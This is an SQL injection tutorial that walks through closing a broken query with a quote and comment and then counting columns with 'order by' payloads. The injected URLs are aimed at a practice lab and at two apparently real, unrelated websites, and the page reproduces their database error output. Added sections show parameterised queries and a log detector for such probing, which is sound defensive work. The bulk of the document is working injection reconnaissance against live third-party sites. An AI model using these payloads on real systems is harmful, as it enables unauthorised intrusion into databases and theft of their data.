First, the nature of SQLi errors. Today I will discuss some common SQL injection errors, and we will also learn how to fix and solve those errors.
1:
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'
Error While Selection process : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1
Now try to fix it by adding a comment at the end.
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' --+
In my case it is fixed, as you can see in the picture.
If it is not fixed by adding --+ or -- -, then use "=", %60 or ; at the end. If that also does not work, remove the single quote and then proceed with order by or group by.
This type of error tells you how many columns the query has. How does it tell? Suppose it has 3 columns and I ask the database whether it has 4 columns, like this:
- http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' order by 1--+
- No error
- http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' order by 2--+
- No error
- http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' order by 3--+
- No error
Now at order by 4:
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' order by 4--+
It generates an error and tells us: Error While Selection process : Unknown column '4' in 'order clause'
So if I do:
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' order by 3--+
This time no error comes and the page loads normally, which means it has 3 columns.
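Why the page behaves this way, seen from the application side, as an added example that is not part of the original post: when the `id` value is concatenated into the SQL text, a quote changes the statement's syntax and `order by 4` is evaluated by the database, while a bound parameter keeps the same input as plain data. SQLite stands in for MySQL (its error wording differs), and the `news` table, its columns and the function names are assumptions.

```python
import sqlite3

def make_db():
    # Constructed sample table with 3 columns, mirroring the 3-column case in the text.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER, title TEXT, body TEXT)")
    db.execute("INSERT INTO news VALUES (1, 'hello', 'world')")
    return db

def lookup_concatenated(db, raw_id):
    """Vulnerable pattern: the request value becomes part of the SQL text."""
    sql = "SELECT * FROM news WHERE id='" + raw_id + "'"
    try:
        return ("rows", db.execute(sql).fetchall())
    except sqlite3.Error as exc:
        # A page that echoes this message shows the database error to the visitor.
        return ("db_error", str(exc))

def lookup_bound(db, raw_id):
    """Hardened pattern: the value is bound and never parsed as SQL."""
    try:
        rows = db.execute("SELECT * FROM news WHERE id = ?", (raw_id,)).fetchall()
        return ("rows", rows)
    except sqlite3.Error:
        # Generic message for the visitor; details belong in the server log.
        return ("db_error", "query failed")

if __name__ == "__main__":
    db = make_db()
    # "--+" in a URL decodes to "-- " (the + is a space), so that form is used here.
    for value in ["1", "1'", "1' order by 3-- ", "1' order by 4-- "]:
        print(repr(value), lookup_concatenated(db, value), lookup_bound(db, value))
```

With the bound version every probe string returns an empty result instead of an error or a reordered query, because the whole value is compared against `id` as data.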
----------------------------------------------------------------------------------------------------------------------
----------------------------------------------------
Let's start:
http://mohitminerals.in/news.php?id=39'
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/mohitmin/public_html/news.php on line 87
This type of error is very easy to solve and is my favourite error.
http://mohitminerals.in/news.php?id=39' --+
In my case it is fixed and balanced by adding --+. In most cases this type of error is fixed by removing the single quote, like this:
http://mohitminerals.in/news.php?id=39 --
This type of error does not tell us "Unknown column 'blah blah' in 'order clause'".
So how do we find the number of columns?
Let's start :D
- http://mohitminerals.in/news.php?id=39' order by 1--+
- No error comes. Loaded normally.
- http://mohitminerals.in/news.php?id=39' order by 2--+
- No error comes. Loaded normally.
- http://mohitminerals.in/news.php?id=39' order by 3--+
- No error comes. Loaded normally.
- http://mohitminerals.in/news.php?id=39' order by 4--+
- No error comes. Loaded normally.
- http://mohitminerals.in/news.php?id=39' order by 5--+
- No error comes. Loaded normally.
- http://mohitminerals.in/news.php?id=39' order by 6--+
- No error comes. Loaded normally.
- http://mohitminerals.in/news.php?id=39' order by 7--+
- No error comes. Loaded normally.
----------------------------------------------------------------------------------------------------------------
http://mohitminerals.in/news.php?id=39' order by 8--+
At order by 8 it generates this error:
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/mohitmin/public_html/news.php on line 87
----------------------------------------------------------------------------------------------------------------
So it means it has 7 columns :p
I hope you got the point :D
-------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------------
3rd type of SQLi error: content missing
------------------------------------------------------------------------------------------------------------------------
Sometimes when we add a single quote the page loads normally but some content is missing. This is also an SQLi error.
Let's go and do some testing.
-------------------------------------------------------------
Before adding the single quote:
http://ceew.in/newsDetails.php?id=177
-------------------------------------------------------------------------------------------------------------------------
Now see the magic when I add the single quote:
http://ceew.in/newsDetails.php?id=177'
-------------------------------------------------------------------
In my case, when I added --+ at the end, the error went away: the page loads normally with all its contents. So it means it is balanced.
http://ceew.in/newsDetails.php?id=177' --+
------------------------------------------------------------------------------------------------------------------------
After fixing it, we now find the number of columns:
- http://ceew.in/newsDetails.php?id=177' order by 1--+
- Page loaded normally with all contents. It means it has 1 column.
- http://ceew.in/newsDetails.php?id=177' order by 2--+
- Page loaded normally with all contents. It means it has 2 columns.
- http://ceew.in/newsDetails.php?id=177' order by 3--+
- Page loaded normally with all contents. It means it has 3 columns.
- http://ceew.in/newsDetails.php?id=177' order by 4--+
- Page loaded normally with all contents. It means it has 4 columns.
- http://ceew.in/newsDetails.php?id=177' order by 5--+
- Page loaded normally with all contents. It means it has 5 columns.
- http://ceew.in/newsDetails.php?id=177' order by 6--+
- Page loaded normally with all contents. It means it has 6 columns.
- http://ceew.in/newsDetails.php?id=177' order by 7--+
- Page loaded normally with all contents. It means it has 7 columns.
- http://ceew.in/newsDetails.php?id=177' order by 8--+
- Page loaded normally with all contents. It means it has 8 columns.
- http://ceew.in/newsDetails.php?id=177' order by 9--+
- Page loaded normally with all contents. It means it has 9 columns.
-----------------------------------------------------------------
Now when I did order by 10, the page loaded normally but with content missing:
http://ceew.in/newsDetails.php?id=177' order by 10--+
So it means it has 9 columns, because at 10 it gives us an error :p
-----------------------------------------------------------------------------------------------------------------------
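The column counting shown in all three cases leaves a recognisable trail in web server logs: one client, one script, a rising `order by n` followed by a comment marker, and in the content-missing case a drop in response size at the last step. A detection sketch over constructed log lines, added here and not part of the original post; the log lines, addresses, `/item.php` path and the `min_steps` threshold are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access-log lines (common log format), not taken from any real server.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2024:10:00:01 +0000] "GET /item.php?id=39%27+order+by+1--+ HTTP/1.1" 200 5120
203.0.113.5 - - [01/Jan/2024:10:00:03 +0000] "GET /item.php?id=39%27+order+by+2--+ HTTP/1.1" 200 5120
203.0.113.5 - - [01/Jan/2024:10:00:05 +0000] "GET /item.php?id=39%27+order+by+3--+ HTTP/1.1" 200 5120
203.0.113.5 - - [01/Jan/2024:10:00:07 +0000] "GET /item.php?id=39%27+order+by+4--+ HTTP/1.1" 200 1874
198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /item.php?id=40 HTTP/1.1" 200 5233
198.51.100.7 - - [01/Jan/2024:10:00:11 +0000] "GET /search.php?q=order+by+1 HTTP/1.1" 200 812
"""

LINE_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3}) (\d+)')
# A quote, digit or ")" followed by ORDER/GROUP BY <n> and then a comment marker.
PROBE_RE = re.compile(r"""['"\d)]\s*(?:order|group)\s+by\s+(\d+)\s*(?:--|#|/\*)""", re.I)

def find_column_probes(log_text, min_steps=3):
    """Return {(client, path): [(n, status, bytes), ...]} for ORDER BY walks."""
    seen = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, target, status, size = m.groups()
        path, _, query = target.partition("?")
        # Decode %27 and "+" before matching, as the application would see them.
        probe = PROBE_RE.search(unquote_plus(query))
        if probe:
            seen[(client, path)].append((int(probe.group(1)), int(status), int(size)))
    # Only report clients that tried several distinct indexes on the same script.
    return {k: v for k, v in seen.items() if len({n for n, _, _ in v}) >= min_steps}

if __name__ == "__main__":
    for (client, path), steps in find_column_probes(SAMPLE_LOG).items():
        print(client, path, steps)
```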
I hope you got it. If you have any questions, feel free to ask.
Author :: (Afghani)
Thanks to: Janus, Amir, Zeeshan, KhexAn, and many more :D